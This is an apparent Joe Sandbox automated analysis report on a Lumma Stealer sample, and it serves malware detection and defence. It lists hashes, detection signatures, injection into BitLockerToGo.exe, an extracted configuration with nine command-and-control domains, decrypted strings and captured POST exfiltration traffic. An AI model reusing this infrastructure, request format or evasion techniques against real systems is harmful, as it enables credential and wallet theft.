Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MPySEh8HaF.exe

Overview

General Information

Sample name:MPySEh8HaF.exe
renamed because original name is a hash value
Original sample name:58cffd92455eec9cd613ede591ed6c2c.exe
Analysis ID:1580844
MD5:58cffd92455eec9cd613ede591ed6c2c
SHA1:388ef427a8f87c9e20a1cb7408b7bd4e81ed4117
SHA256:a7c488cf2a71ee29da1d9267bd7d3bc9f9e4d5ff1c2da0db5669e0af44a232e8
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • MPySEh8HaF.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\MPySEh8HaF.exe" MD5: 58CFFD92455EEC9CD613EDE591ED6C2C)
    • BitLockerToGo.exe (PID: 7676 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["treehoneyi.click", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "rAGxSF--sheev"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:25.214023+010020283713Unknown Traffic192.168.2.449735172.67.180.113443TCP
                2024-12-26T12:01:27.363336+010020283713Unknown Traffic192.168.2.449737172.67.180.113443TCP
                2024-12-26T12:01:30.177968+010020283713Unknown Traffic192.168.2.449738172.67.180.113443TCP
                2024-12-26T12:01:32.745925+010020283713Unknown Traffic192.168.2.449739172.67.180.113443TCP
                2024-12-26T12:01:35.447332+010020283713Unknown Traffic192.168.2.449740172.67.180.113443TCP
                2024-12-26T12:01:37.988249+010020283713Unknown Traffic192.168.2.449741172.67.180.113443TCP
                2024-12-26T12:01:40.516752+010020283713Unknown Traffic192.168.2.449742172.67.180.113443TCP
                2024-12-26T12:01:43.487771+010020283713Unknown Traffic192.168.2.449743172.67.180.113443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:25.996826+010020546531A Network Trojan was detected192.168.2.449735172.67.180.113443TCP
                2024-12-26T12:01:28.174922+010020546531A Network Trojan was detected192.168.2.449737172.67.180.113443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:25.996826+010020498361A Network Trojan was detected192.168.2.449735172.67.180.113443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:28.174922+010020498121A Network Trojan was detected192.168.2.449737172.67.180.113443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:31.200309+010020480941Malware Command and Control Activity Detected192.168.2.449738172.67.180.113443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:01:40.521382+010028438641A Network Trojan was detected192.168.2.449742172.67.180.113443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: MPySEh8HaF.exeAvira: detected
                Found malware configuration
                Source: 2.2.BitLockerToGo.exe.530000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["treehoneyi.click", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "rAGxSF--sheev"}
                Multi AV Scanner detection for submitted file
                Source: MPySEh8HaF.exeReversingLabs: Detection: 55%
                Source: MPySEh8HaF.exeVirustotal: Detection: 58%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: treehoneyi.click
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: treehoneyi.click
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: treehoneyi.click
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: treehoneyi.click
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: treehoneyi.click
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmpString decryptor: rAGxSF--sheev
                Source: MPySEh8HaF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: MPySEh8HaF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 172.67.180.113:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: treehoneyi.click
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Joe Sandbox ViewIP Address: 172.67.180.113 172.67.180.113
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.180.113:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.180.113:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QN7TZRE36WBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18121Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NZKI1E0ZV4QP4CG2XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8778Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5WUKJX71OLLRGGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20413Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UYZYJ2CR9XWAIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: treehoneyi.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5CCKHBLPQDP6JKKBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573418Host: treehoneyi.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: treehoneyi.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treehoneyi.click
                Source: MPySEh8HaF.exeString found in binary or memory: http://.css
                Source: MPySEh8HaF.exeString found in binary or memory: http://.jpg
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: MPySEh8HaF.exeString found in binary or memory: http://html4/loose.dtd
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1977772504.0000000004DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/
                Source: BitLockerToGo.exe, 00000002.00000003.1976536875.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/)
                Source: BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/B
                Source: BitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/Y
